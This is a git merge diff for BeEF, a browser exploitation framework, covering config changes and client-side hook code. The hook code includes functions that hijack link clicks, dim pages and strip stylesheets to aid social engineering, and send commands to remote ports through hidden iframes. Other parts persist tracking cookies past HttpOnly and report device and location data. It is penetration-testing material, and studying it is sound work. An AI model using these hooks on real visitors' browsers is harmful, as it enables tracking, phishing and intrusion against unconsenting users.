Merge pull request #924 from phihag/install-pipeline-instead-of-fifo

Use a pipe instead of a fifo during installation

.gitignore

@@ -1,3 +1,8 @@
 beef.db
 test/msf-test
-custom-config.yaml
+custom-config.yaml
+.DS_Store
+.gitignore
+.rvmrc
+
+*.lock

BeEFLive.sh

@@ -1,110 +1,2 @@
-#!/bin/bash
-#
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'home/beef/doc/COPYING' for copying permission
-#
-
-   
-#
-# This is the auto startup script for the BeEF Live CD. 
-# IT SHOULD ONLY BE RUN ON THE LIVE CD
-# Download LiveCD here: https://github.com/beefproject/beef/downloads
-#
-# This script contains a few fixes to make BeEF play nicely with the way  
-# remastersys creates the live cd distributable as well as generating host keys 
-# to enable SSH etc. The script also make it easy for the user to update/start 
-# the BeEF server
-#
-clear
-echo "======================================"
-echo "          BeEF Live CD   "
-echo "======================================"
-echo ""
-echo "Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net"
-echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
-echo "See the file 'home/beef/doc/COPYING' for copying permission"
-echo ""
-
-echo "Welcome to the BeEF Live CD" 
-echo "" 
-echo ""
-
-#
-# Check for SSH Host Keys - if they do not exist ask user if they should be 
-# created (remastersys has a habit of deleting them during Live CD Creation)
-#
-f1="/etc/ssh/ssh_host_rsa_key"
-if [ -f $f1 ]
-then
-	echo ""
-else 
-	echo -n "Would you like to enable ssh (y/N)? "
-	read var
-	
-	if [ $var = "y" ] ; then
-		 sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
-		 sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
-		 echo ""
-		 echo "Please provide a password for ssh user: beef"
-		 sudo passwd beef
-		 echo "ssh enabled"
-	fi
-fi
-echo ""
-
-#
-# Prompt the user if they would like to update BeEF and 
-# other components installed (such as sqlmap and msf)
-#
-echo -n "Check and install updates for BeEF (y/N)? "
-read var
-
-if [ $var = "y" ] ; then
-	 cd /opt/beef
-	 git stash
-	 git pull
-fi
-echo ""
-
-echo -n "Check and install updates for msf and sqlmap (y/N)? "
-read var
-
-if [ $var = "y" ] ; then
- 	 cd /opt/sqlmap
- 	 git stash
-	 git pull
-	 cd /opt/metasploit-framework
-	 git stash
-	 git pull
-fi
- 
- 
-#
-# Create a shortcut in the user's home folder to BeEF, msf and sqlmap
-# (if they do not yet exist)
-#
-f1="beef"
-if [ -f $f1 ] ; then
-	echo ""
-else
-	ln -s /opt/beef/ beef
-	ln -s /opt/metasploit-framework/ msf
-	ln -s /opt/sqlmap/ sqlmap
-fi
-
-#
-# Prompt the user if they would like start BeEF
-#
-echo -n "Start BeEF (y/N)? "
-read var
-
-if [ $var = "y" ] ; then
-	echo ""
-	echo "Starting BeEF..";
-	
-	cd /opt/beef
-	ruby beef -x
-fi
-
-
+# Reference for old (<1.2) versions of BeEF Live
+bash /opt/beef/liveCD/BeEFLive.sh

Gemfile

@@ -9,13 +9,12 @@
 # Gems only required on Windows, or with specific Windows issues
 if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
   gem "win32console"
-  gem "eventmachine", "1.0.0.beta.4.1"
-else
-  gem "eventmachine", "0.12.10"
 end
 
+gem "eventmachine", "1.0.3"
 gem "thin"
-gem "sinatra", "1.3.2"
+gem "sinatra", "1.4.2"
+gem "rack", "1.5.2"
 gem "em-websocket", "~> 0.3.6"
 gem "jsmin", "~> 1.0.1"
 gem "ansi"

Rakefile

@@ -76,10 +76,10 @@ end
 @beef_process_id = nil;
 
 task :beef_start => 'beef' do
-  printf "Starting BeEF (wait 10 seconds)..."
+  printf "Starting BeEF (wait a few seconds)..."
   @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
-  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
-  delays.each do |i| # delay for 10 seconds
+  delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
+  delays.each do |i| # delay for a few seconds
     printf '.'
     sleep (i)
   end

VERSION

@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.3.9-alpha
+0.4.4.7-alpha

beef

@@ -75,6 +75,7 @@ case config.get("beef.database.driver")
     DataMapper.setup(:default,
                      :adapter => config.get("beef.database.driver"),
                      :host => config.get("beef.database.db_host"),
+                     :port => config.get("beef.database.db_port"),
                      :username => config.get("beef.database.db_user"),
                      :password => config.get("beef.database.db_passwd"),
                      :database => config.get("beef.database.db_name"),

config.yaml

@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.3.9-alpha'
+    version: '0.4.4.7-alpha'
     debug: false
 
     restrictions:
@@ -27,12 +27,20 @@ beef:
         # if running behind a nat set the public ip address here
         #public: ""
         #public_port: "" # port setting is experimental
-        dns: "localhost"
+        # DNS
+        dns_host: "localhost"
+        dns_port: 53
         panel_path: "/ui/panel"
         hook_file: "/hook.js"
         hook_session_name: "BEEFHOOK"
         session_cookie_name: "BEEFSESSION"
 
+        # Allow one or multiple domains to access the RESTful API using CORS
+        # For multiple domains use: "http://browserhacker.com, http://domain2.com"
+        restful_api:
+            allow_cors: false
+            cors_allowed_domains: "http://browserhacker.com"
+
         # Prefer WebSockets over XHR-polling when possible.
         websocket:
           enable: false
@@ -43,14 +51,14 @@ beef:
 
         # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
         web_server_imitation:
-            enable: false
+            enable: true
             type: "apache" #supported: apache, iis
 
         # Experimental HTTPS support for the hook / admin / all other Thin managed web services
         https:
             enable: false
             # In production environments, be sure to use a valid certificate signed for the value
-            # used in beef.http.dns (the domain name of the server where you run BeEF)
+            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
             key: "beef_key.pem"
             cert: "beef_cert.pem"
 
@@ -72,6 +80,7 @@ beef:
 
         # db connection information is only used for mysql/postgres
         db_host: "localhost"
+        db_port: 5432
         db_name: "beef"
         db_user: "beef"
         db_passwd: "beef123"
@@ -91,6 +100,10 @@ beef:
 
     crypto_default_value_length: 80
 
+    # Enable client-side debugging
+    client:
+        debug: false
+
     # You may override default extension configuration parameters here
     extension:
         requester:

core/bootstrap.rb

@@ -24,6 +24,8 @@ require 'core/main/handlers/browserdetails'
 
 # @note Include the network stack
 require 'core/main/network_stack/handlers/dynamicreconstruction'
+require 'core/main/network_stack/handlers/redirector'
+require 'core/main/network_stack/handlers/raw'
 require 'core/main/network_stack/assethandler'
 require 'core/main/network_stack/api'
 

core/filters/browser.rb

@@ -22,7 +22,7 @@ module Filters
   def self.is_valid_browsertype?(str)
     return false if not is_non_empty_string?(str)
     return false if str.length < 10
-    return false if str.length > 50
+    return false if str.length > 250
     return false if has_non_printable_char?(str)
     true
   end
@@ -123,9 +123,9 @@ module Filters
     return true if not is_non_empty_string?(str)
     return false if str.length > 1000
     if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
     else
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
     end
   end
 

core/main/client/are.js

@@ -9,8 +9,39 @@ beef.are = {
    var Jools = require('jools');
    this.ruleEngine = new Jools();
   },
-  rules:[],
+  send:function(module){
+    // there will probably be some other stuff here before things are finished
+    this.commands.push(module);
+  },
+  execute:function(inputs){
+    this.rulesEngine.execute(input);
+  },
+  cache_modules:function(modules){},
+  rules:[
+    {
+      'name':"exec_no_input",
+      'condition':function(command,browser){
+          //need to figure out how to handle the inputs
+          return (!command['inputs'] || command['inputs'].length == 0)
+       },
+      'consequence':function(command,browser){}
+    },
+    {
+      'name':"module_has_sibling",
+      'condition':function(command,commands){
+        return false;
+      },
+      'consequence':function(command,commands){}
+    },
+    {
+      'name':"module_depends_on_module",
+      'condition':function(command,commands){
+        return false;
+      },
+      'consequence':function(command,commands){}
+    }
+  ],
   commands:[],
   results:[]
 };
-beef.regCmp("beef.are");
+beef.regCmp("beef.are");

core/main/client/beef.js

@@ -31,7 +31,21 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 		
 		// An array containing all the BeEF JS components.
 		components: new Array(),
-		
+
+                /**
+                 * Adds a function to display debug messages (wraps console.log())
+                 * @param: {string} the debug string to return
+                 */
+                debug: function(msg) {
+                    if (!<%= @client_debug %>) return;
+                    if (typeof console == "object" && typeof console.log == "function") {
+                        console.log(msg);
+                    } else {
+                        // TODO: maybe add a callback to BeEF server for debugging purposes
+                        //window.alert(msg);
+                    }
+                },
+
 		/**
 		 * Adds a function to execute.
 		 * @param: {Function} the function to execute.

core/main/client/dom.js

@@ -76,6 +76,30 @@ beef.dom = {
 		
 		return iframe;
 	},
+
+	/**
+	 * Returns the highest current z-index
+	 * @param: {Boolean} whether to return an associative array with the height AND the ID of the element
+	 * @return: {Integer} Highest z-index in the DOM
+	 * OR
+	 * @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
+	 */
+	getHighestZindex: function(include_id) {
+		var highest = {'height':0, 'elem':''};
+		$j('*').each(function() {
+			var current_high = parseInt($j(this).css("zIndex"),10);
+			if (current_high > highest.height) {
+				highest.height = current_high;
+				highest.elem = $j(this).attr('id');
+			}
+		});
+
+		if (include_id) {
+			return highest;
+		} else {
+			return highest.height;
+		}
+	},
 	
 	/**
      * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
@@ -95,8 +119,15 @@ beef.dom = {
 			var form_action = params['src'];
 			params['src'] = '';
 		}
-		if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); }
-		if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
+		if (type == 'hidden') {
+			css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
+		} else if (type == 'fullscreen') {
+			css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
+			$j('body').css({'padding':'0px', 'margin':'0px'});
+		} else {
+			css = styles;
+			$j('body').css({'padding':'0px', 'margin':'0px'});
+		}
 		var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
 		
 		if (form_submit && form_action)
@@ -127,6 +158,75 @@ beef.dom = {
             }
         });
     },
+
+    /**
+     * Load a full screen div that is black, or, transparent
+     * @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
+     * @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
+     *         opacity:0-100         // Lower number = less grayout higher = more of a blackout
+     *           // By default this is 70 
+     *         zindex: #             // HTML elements with a higher zindex appear on top of the gray out
+     *           // By default this will use beef.dom.getHighestZindex to always go to the top
+     *         bgcolor: (#xxxxxx)    // Standard RGB Hex color code
+     *           // By default this is #000000
+     */
+	grayOut: function(vis, options) {
+	  // in any order.  Pass only the properties you need to set.
+	  var options = options || {};
+	  var zindex = options.zindex || beef.dom.getHighestZindex()+1;
+	  var opacity = options.opacity || 70;
+	  var opaque = (opacity / 100);
+	  var bgcolor = options.bgcolor || '#000000';
+	  var dark=document.getElementById('darkenScreenObject');
+	  if (!dark) {
+	    // The dark layer doesn't exist, it's never been created.  So we'll
+	    // create it here and apply some basic styles.
+	    // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
+	    var tbody = document.getElementsByTagName("body")[0];
+	    var tnode = document.createElement('div');           // Create the layer.
+	        tnode.style.position='absolute';                 // Position absolutely
+	        tnode.style.top='0px';                           // In the top
+	        tnode.style.left='0px';                          // Left corner of the page
+	        tnode.style.overflow='hidden';                   // Try to avoid making scroll bars            
+	        tnode.style.display='none';                      // Start out Hidden
+	        tnode.id='darkenScreenObject';                   // Name it so we can find it later
+	    tbody.appendChild(tnode);                            // Add it to the web page
+	    dark=document.getElementById('darkenScreenObject');  // Get the object.
+	  }
+	  if (vis) {
+	    // Calculate the page width and height 
+	    if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
+	        var pageWidth = document.body.scrollWidth+'px';
+	        var pageHeight = document.body.scrollHeight+'px';
+	    } else if( document.body.offsetWidth ) {
+	      var pageWidth = document.body.offsetWidth+'px';
+	      var pageHeight = document.body.offsetHeight+'px';
+	    } else {
+	       var pageWidth='100%';
+	       var pageHeight='100%';
+	    }
+	    //set the shader to cover the entire page and make it visible.
+	    dark.style.opacity=opaque;
+	    dark.style.MozOpacity=opaque;
+	    dark.style.filter='alpha(opacity='+opacity+')';
+	    dark.style.zIndex=zindex;
+	    dark.style.backgroundColor=bgcolor;
+	    dark.style.width= pageWidth;
+	    dark.style.height= pageHeight;
+	    dark.style.display='block';
+	  } else {
+	     dark.style.display='none';
+	  }
+	},
+
+	/**
+	 * Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
+	 *  or, re-writing a document this is useful.
+	 */
+	removeStylesheets: function() {
+		$j('link[rel=stylesheet]').remove();
+		$j('style').remove();
+	},
 	
 	/**
      * Create a form element with the specified parameters, appending it to the DOM if append == true
@@ -178,6 +278,23 @@ beef.dom = {
 		}).length;
 	},
 
+	/**
+	 * Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
+	 * http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html
+	 * @param: {String} url: the url to be rewritten
+	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
+	 * @return: {Number} the amount of links found in the DOM and rewritten.
+	 */
+	rewriteLinksClickEvents: function(url, selector) {
+		var sel = (selector == null) ? 'a' : selector;
+		return $j(sel).each(function() {
+			if ($j(this).attr('href') != null)
+			{
+				$j(this).click(function() {this.href=url});
+			}
+		}).length;
+	},
+
 	/**
      * Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)
 	 * @param: {String} old_protocol: the old link protocol to be rewritten
@@ -275,7 +392,7 @@ beef.dom = {
             }
             content += "</object>";
         }
-        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) {
+        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
 
             if (codebase != null) {
                 content = "" +
@@ -294,24 +411,25 @@ beef.dom = {
             }
             content += "</applet>";
         }
-        if (beef.browser.isFF()) {
-            if (codebase != null) {
-                content = "" +
-                    "<embed id='" + id + "' code='" + code + "' " +
-                    "type='application/x-java-applet' codebase='" + codebase + "' " +
-                    "height='0' width='0' name='" + name + "'>";
-            } else {
-                content = "" +
-                    "<embed id='" + id + "' code='" + code + "' " +
-                    "type='application/x-java-applet' archive='" + archive + "' " +
-                    "height='0' width='0' name='" + name + "'>";
-            }
-
-            if (params != null) {
-                content += beef.dom.parseAppletParams(params);
-            }
-            content += "</embed>";
-        }
+        // For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
+//        if (beef.browser.isFF()) {
+//            if (codebase != null) {
+//                content = "" +
+//                    "<embed id='" + id + "' code='" + code + "' " +
+//                    "type='application/x-java-applet' codebase='" + codebase + "' " +
+//                    "height='0' width='0' name='" + name + "'>";
+//            } else {
+//                content = "" +
+//                    "<embed id='" + id + "' code='" + code + "' " +
+//                    "type='application/x-java-applet' archive='" + archive + "' " +
+//                    "height='0' width='0' name='" + name + "'>";
+//            }
+//
+//            if (params != null) {
+//                content += beef.dom.parseAppletParams(params);
+//            }
+//            content += "</embed>";
+//        }
         $j('body').append(content);
     },
 
@@ -358,11 +476,11 @@ beef.dom = {
      * @params: {String} rport: remote port
      * @params: {String} commands: protocol commands to be executed by the remote host:port service
      */
-    createIframeIpecForm: function(rhost, rport, commands){
+    createIframeIpecForm: function(rhost, rport, path, commands){
         var iframeIpec = beef.dom.createInvisibleIframe();
 
         var formIpec = document.createElement('form');
-        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+'/index.html');
+        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+path);
         formIpec.setAttribute('method',  'POST');
         formIpec.setAttribute('enctype', 'multipart/form-data');
 

core/main/client/geolocation.js

@@ -32,14 +32,14 @@ beef.geolocation = {
 
         $j.ajax({
             error: function(xhr, status, error){
-                //console.log("[geolocation.js] openstreetmap error");
+                beef.debug("[geolocation.js] openstreetmap error");
                 beef.net.send(command_url, command_id, "latitude=" + latitude
                              + "&longitude=" + longitude
                              + "&osm=UNAVAILABLE"
                              + "&geoLocEnabled=True");
                 },
             success: function(data, status, xhr){
-                //console.log("[geolocation.js] openstreetmap success");
+                beef.debug("[geolocation.js] openstreetmap success");
                 var jsonResp = $j.parseJSON(data);
 
                 beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -64,16 +64,16 @@ beef.geolocation = {
 	        beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");	
 			return;
 		}
-        //console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
+        beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
         navigator.geolocation.getCurrentPosition( //note: this is an async call
 			function(position){ // success
 				var latitude = position.coords.latitude;
         		var longitude = position.coords.longitude;
-                //console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
+                beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
                 beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
 
 			}, function(error){ // failure
-                    //console.log("[geolocation.js] error [%d] getting position", error.code);
+                    beef.debug("[geolocation.js] error [%d] getting position", error.code);
 					switch(error.code) // Returns 0-3
 					{
 						case 0:

core/main/client/hardware.js

@@ -7,39 +7,51 @@
 beef.hardware = {
 
 	ua: navigator.userAgent,
-	
-	isWinPhone: function() {
-		return (this.ua.match('(Windows Phone)')) ? true : false;
-	},
-	
-	isIphone: function() {
-		return (this.ua.indexOf('iPhone') != -1) ? true : false;
+
+	cpuType: function() {
+		// IE
+		if (typeof navigator.cpuClass != 'undefined') {
+			cpu = navigator.cpuClass;
+			if (cpu == "x86")   return "32-bit";
+			if (cpu == "68K")   return "Motorola 68K";
+			if (cpu == "PPC")   return "Motorola PPC";
+			if (cpu == "Alpha") return "Digital";
+			if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
+			if (this.ua.match('Win64; x64'))  return "64-bit (AMD)";
+		// Firefox
+        } else if (typeof navigator.oscpu != 'undefined') {
+			if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
+		}
+		if (navigator.platform.toLowerCase() == "win64") return "64-bit";
+		return "32-bit";
 	},
 
-	isIpad: function() {
-		return (this.ua.indexOf('iPad') != -1) ? true : false;
+	isTouchEnabled: function() {
+		if ('ontouchstart' in document) return true;
+		return false;
 	},
 
-	isIpod: function() {
-		return (this.ua.indexOf('iPod') != -1) ? true : false;
+	isVirtualMachine: function() {
+		if (screen.width % 2 || screen.height % 2) return true;
+		return false;
+	},
+
+	isLaptop: function() {
+		// Most common laptop screen resolution
+		if (screen.width == 1366 && screen.height == 768) return true;
+		// Netbooks
+		if (screen.width == 1024 && screen.height == 600) return true;
+		return false;
 	},
 
 	isNokia: function() {
 		return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
 	},
 
-	isBlackBerry: function() {
-		return (this.ua.match('BlackBerry')) ? true : false;
-	},
-
 	isZune: function() {
 		return (this.ua.match('ZuneWP7')) ? true : false;
 	},
 
-	isKindle: function() {
-		return (this.ua.match('Kindle')) ? true : false;
-	},
-
 	isHtc: function() {
 		return (this.ua.match('HTC')) ? true : false;
 	},
@@ -48,10 +60,6 @@ beef.hardware = {
 		return (this.ua.match('Ericsson')) ? true : false;
 	},
 
-	isNokia: function() {
-		return (this.ua.match('Nokia')) ? true : false;
-	},
-
 	isMotorola: function() {
 		return (this.ua.match('Motorola')) ? true : false;
 	},
@@ -60,23 +68,62 @@ beef.hardware = {
 		return (this.ua.match('Nexus One')) ? true : false;
 	},
 
-	getName: function() {
+        /**
+         * Returns true if the browser is on a Mobile Phone
+         * @return: {Boolean} true or false
+         *
+         * @example: if(beef.hardware.isMobilePhone()) { ... }
+         **/
+        isMobilePhone: function() {
+            return DetectMobileQuick();
+        },
 
-		if (this.isNokia()) return 'Nokia';
-		if (this.isWinPhone()) return 'Windows Phone';
-		if (this.isBlackBerry()) return 'BlackBerry';
-		if (this.isIphone()) return 'iPhone';
-		if (this.isIpad()) return 'iPad';
-		if (this.isIpod()) return 'iPod';
-		if (this.isKindle()) return 'Kindle';
-		if (this.isHtc()) return 'HTC';
-		if (this.isMotorola()) return 'Motorola';
-		if (this.isZune()) return 'Zune';
-		if (this.isGoogle()) return 'Google';
-		if (this.isEricsson()) return 'Ericsson';
+	getName: function() {
+                var ua = navigator.userAgent.toLowerCase();
+                if(DetectIphone())              { return "iPhone"};
+                if(DetectIpod())                { return "iPod Touch"};
+                if(DetectIpad())                { return "iPad"};
+		if (this.isHtc())               { return 'HTC'};
+		if (this.isMotorola())          { return 'Motorola'};
+		if (this.isZune())              { return 'Zune'};
+		if (this.isGoogle())            { return 'Google Nexus One'};
+		if (this.isEricsson())          { return 'Ericsson'};
+                if(DetectAndroidPhone())        { return "Android Phone"};
+                if(DetectAndroidTablet())       { return "Android Tablet"};
+                if(DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
+                if(ua.search(deviceS60) > -1)   { return "Nokia S60"};
+                if(ua.search(deviceS70) > -1)   { return "Nokia S70"};
+                if(ua.search(deviceS80) > -1)   { return "Nokia S80"};
+                if(ua.search(deviceS90) > -1)   { return "Nokia S90"};
+                if(ua.search(deviceSymbian) > -1)   { return "Nokia Symbian"};
+		if (this.isNokia())             { return 'Nokia'};
+                if(DetectWindowsPhone7())       { return "Windows Phone 7"};
+                if(DetectWindowsMobile())       { return "Windows Mobile"};
+                if(DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
+                if(DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
+                if(DetectBlackBerryTouch())     { return "BlackBerry Touch"};
+                if(DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
+                if(DetectBlackBerry())          { return "BlackBerry"};
+                if(DetectPalmOS())              { return "Palm OS"};
+                if(DetectPalmWebOS())           { return "Palm Web OS"};
+                if(DetectGarminNuvifone())      { return "Gamin Nuvifone"};
+                if(DetectArchos())              { return "Archos"}
+                if(DetectBrewDevice())          { return "Brew"};
+                if(DetectDangerHiptop())        { return "Danger Hiptop"};
+                if(DetectMaemoTablet())         { return "Maemo Tablet"};
+                if(DetectSonyMylo())            { return "Sony Mylo"};
+                if(DetectAmazonSilk())          { return "Kindle Fire"};
+                if(DetectKindle())              { return "Kindle"};
+                if(DetectSonyPlaystation())                 { return "Playstation"};
+                if(ua.search(deviceNintendoDs) > -1)        { return "Nintendo DS"};
+                if(ua.search(deviceWii) > -1)               { return "Nintendo Wii"};
+                if(ua.search(deviceNintendo) > -1)          { return "Nintendo"};
+                if(DetectXbox())                            { return "Xbox"};
+				if(this.isLaptop())							{ return "Laptop"};
+                if(this.isVirtualMachine())                 { return "Virtual Machine"};
 
 		return 'Unknown';
 	}
 };
 
-beef.regCmp('beef.net.hardware');
+beef.regCmp('beef.hardware');

core/main/client/init.js

@@ -13,7 +13,8 @@
  * and will have a new session id. The new session id will need to know
  * the brwoser details. So sendback the browser details again.
  */
-BEEFHOOK = beef.session.get_hook_session_id();
+
+beef.session.get_hook_session_id();
 
 if (beef.pageIsLoaded) {
     beef.net.browser_details();
@@ -31,7 +32,7 @@ window.onpopstate = function (event) {
             try {
                 callback(event);
             } catch (e) {
-                console.log("window.onpopstate - couldn't execute callback: " + e.message);
+                beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
             }
             return false;
         }
@@ -46,7 +47,7 @@ window.onclose = function (event) {
             try {
                 callback(event);
             } catch (e) {
-                console.log("window.onclose - couldn't execute callback: " + e.message);
+                beef.debug("window.onclose - couldn't execute callback: " + e.message);
             }
             return false;
         }

core/main/client/lib/evercookie.js

@@ -793,14 +793,19 @@ this.waitForSwf = function(i)
 
 this.evercookie_cookie = function(name, value)
 {
-	if (typeof(value) != "undefined")
-	{
-		// expire the cookie first
-		document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
-		document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
-	}
-	else
-		return this.getFromStr(name, document.cookie);
+    try{
+        if (typeof(value) != "undefined")
+        {
+            // expire the cookie first
+            document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
+            document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
+        }
+        else
+            return this.getFromStr(name, document.cookie);
+    }catch(e){
+        // the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
+        // evercookie_userdata and evercookie_window will be used in this case.
+    }
 };
 
 // get value from param-like string (eg, "x=y&name=VALUE")

core/main/client/lib/mdetect.js

@@ -0,0 +1,706 @@
+
+/* *******************************************
+// Copyright 2010-2012, Anthony Hand
+// mdetect : http://code.google.com/p/mobileesp/source/browse/JavaScript/mdetect.js r215
+// LICENSE INFORMATION
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//        http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing,
+// software distributed under the License is distributed on an
+// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
+// either express or implied. See the License for the specific
+// language governing permissions and limitations under the License.
+// *******************************************
+*/
+
+var isIphone = false;
+var isAndroidPhone = false;
+var isTierTablet = false;
+var isTierIphone = false;
+var isTierRichCss = false;
+var isTierGenericMobile = false;
+
+var engineWebKit = "webkit";
+var deviceIphone = "iphone";
+var deviceIpod = "ipod";
+var deviceIpad = "ipad";
+var deviceMacPpc = "macintosh"; //Used for disambiguation
+
+var deviceAndroid = "android";
+var deviceGoogleTV = "googletv";
+var deviceXoom = "xoom"; //Motorola Xoom
+var deviceHtcFlyer = "htc_flyer"; //HTC Flyer
+
+var deviceNuvifone = "nuvifone"; //Garmin Nuvifone
+
+var deviceSymbian = "symbian";
+var deviceS60 = "series60";
+var deviceS70 = "series70";
+var deviceS80 = "series80";
+var deviceS90 = "series90";
+
+var deviceWinPhone7 = "windows phone os 7";
+var deviceWinMob = "windows ce";
+var deviceWindows = "windows";
+var deviceIeMob = "iemobile";
+var devicePpc = "ppc"; //Stands for PocketPC
+var enginePie = "wm5 pie";  //An old Windows Mobile
+
+var deviceBB = "blackberry";
+var vndRIM = "vnd.rim"; //Detectable when BB devices emulate IE or Firefox
+var deviceBBStorm = "blackberry95"; //Storm 1 and 2
+var deviceBBBold = "blackberry97"; //Bold 97x0 (non-touch)
+var deviceBBBoldTouch = "blackberry 99"; //Bold 99x0 (touchscreen)
+var deviceBBTour = "blackberry96"; //Tour
+var deviceBBCurve = "blackberry89"; //Curve 2
+var deviceBBCurveTouch = "blackberry 938"; //Curve Touch 9380
+var deviceBBTorch = "blackberry 98"; //Torch
+var deviceBBPlaybook = "playbook"; //PlayBook tablet
+
+var devicePalm = "palm";
+var deviceWebOS = "webos"; //For Palm's line of WebOS devices
+var deviceWebOShp = "hpwos"; //For HP's line of WebOS devices
+
+var engineBlazer = "blazer"; //Old Palm browser
+var engineXiino = "xiino";
+
+var deviceKindle = "kindle"; //Amazon Kindle, eInk one
+var engineSilk = "silk"; //Amazon's accelerated Silk browser for Kindle Fire
+
+var vndwap = "vnd.wap";
+var wml = "wml";
+
+var deviceTablet = "tablet"; //Generic term for slate and tablet devices
+var deviceBrew = "brew";
+var deviceDanger = "danger";
+var deviceHiptop = "hiptop";
+var devicePlaystation = "playstation";
+var deviceNintendoDs = "nitro";
+var deviceNintendo = "nintendo";
+var deviceWii = "wii";
+var deviceXbox = "xbox";
+var deviceArchos = "archos";
+
+var engineOpera = "opera"; //Popular browser
+var engineNetfront = "netfront"; //Common embedded OS browser
+var engineUpBrowser = "up.browser"; //common on some phones
+var engineOpenWeb = "openweb"; //Transcoding by OpenWave server
+var deviceMidp = "midp"; //a mobile Java technology
+var uplink = "up.link";
+var engineTelecaQ = 'teleca q'; //a modern feature phone browser
+
+var devicePda = "pda";
+var mini = "mini";  //Some mobile browsers put 'mini' in their names.
+var mobile = "mobile"; //Some mobile browsers put 'mobile' in their user agent strings.
+var mobi = "mobi"; //Some mobile browsers put 'mobi' in their user agent strings.
+
+var maemo = "maemo";
+var linux = "linux";
+var qtembedded = "qt embedded"; //for Sony Mylo and others
+var mylocom2 = "com2"; //for Sony Mylo also
+
+var manuSonyEricsson = "sonyericsson";
+var manuericsson = "ericsson";
+var manuSamsung1 = "sec-sgh";
+var manuSony = "sony";
+var manuHtc = "htc"; //Popular Android and WinMo manufacturer
+
+var svcDocomo = "docomo";
+var svcKddi = "kddi";
+var svcVodafone = "vodafone";
+
+var disUpdate = "update"; //pda vs. update
+
+var uagent = "";
+if (navigator && navigator.userAgent)
+    uagent = navigator.userAgent.toLowerCase();
+
+function DetectIphone()
+{
+   if (uagent.search(deviceIphone) > -1)
+   {
